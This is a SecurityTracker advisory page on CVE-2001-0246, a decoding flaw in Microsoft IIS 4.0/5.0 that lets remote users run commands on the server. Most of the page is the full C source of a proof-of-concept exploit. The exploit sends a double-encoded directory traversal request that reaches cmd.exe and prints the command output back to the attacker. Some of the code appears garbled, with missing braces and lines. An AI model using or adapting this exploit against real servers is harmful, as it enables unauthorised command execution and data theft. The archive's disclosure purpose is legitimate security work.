Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
(Exploit Code) Re: Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error
SecurityTracker Alert ID:  1001546
SecurityTracker URL:
CVE Reference:   CVE-2001-0246   (Links to External Site)
Date:  May 15 2001
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): IIS 5.0, IIS 4.0 (except when on NT 4 with SP6/SP6a[without any new hotfix])
Description:   NSFOCUS announced discovery of a vulnerability in Microsoft Internet Information Server that allows remote users to execute commands on the server.

A user has released some demonstration exploit code. See the Source Message for the code.

For details on the vulnerability, see the Vendor URL or the Message History.

Impact:   A remote user can execute commands on and retrieve files from the server.
Solution:   Microsoft has prepared a fix (which will be posted shortly).
Vendor URL: (Links to External Site)
Cause:   State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
May 15 2001 Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error

 Source Message Contents

Subject:  IIS Exploit

 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 * DISCLAIMER:    This  is  proof of concept code.  This means, this
 * may only be used on approved systems in order to test the
 * and integrity of machines  during a legal penetration test.  In no
 * is the  author of  this exploit  responsible for the use and result
 * this code.

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>

/* Modify this value to whichever sequence you want.
 * %255c = %%35c = %%35%63 = %25%35%63 = /

#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"

int main(int argc, char *argv[])

 struct sockaddr_in sin;
 char recvbuffer[1], stuff[200];
 int create_socket;

 printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |

 if (argc < 3)
  printf(" -- Usage: iisexec [ip] [command]\n");

if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
 printf(" -- Socket created.\n");

 sin.sin_family = AF_INET;
 sin.sin_port = htons(80);
 sin.sin_addr.s_addr = inet_addr(argv[1]);

if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
 printf(" -- Connection made.\n");
 { printf(" -- No connection.\n"); exit(1); }

 strcat(stuff, "GET ");
 strcat(stuff, SHOWSEQUENCE);
 strcat(stuff, argv[2]);
 strcat(stuff, " HTTP/1.0\n\n");

 memset(recvbuffer, '\0',sizeof(recvbuffer));

 send(create_socket, stuff, sizeof(stuff), 0);
 recv(create_socket, recvbuffer, sizeof (recvbuffer),0);

 if ( ( strstr(recvbuffer,"404") == NULL ) )

     printf(" -- Command output:\n\n");
     while(recv(create_socket, recvbuffer, 1, 0) > 0)
     printf("%c", recvbuffer[0]);

  printf(" -- Wrong command processing. \n");



// EOF - More exploits @


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC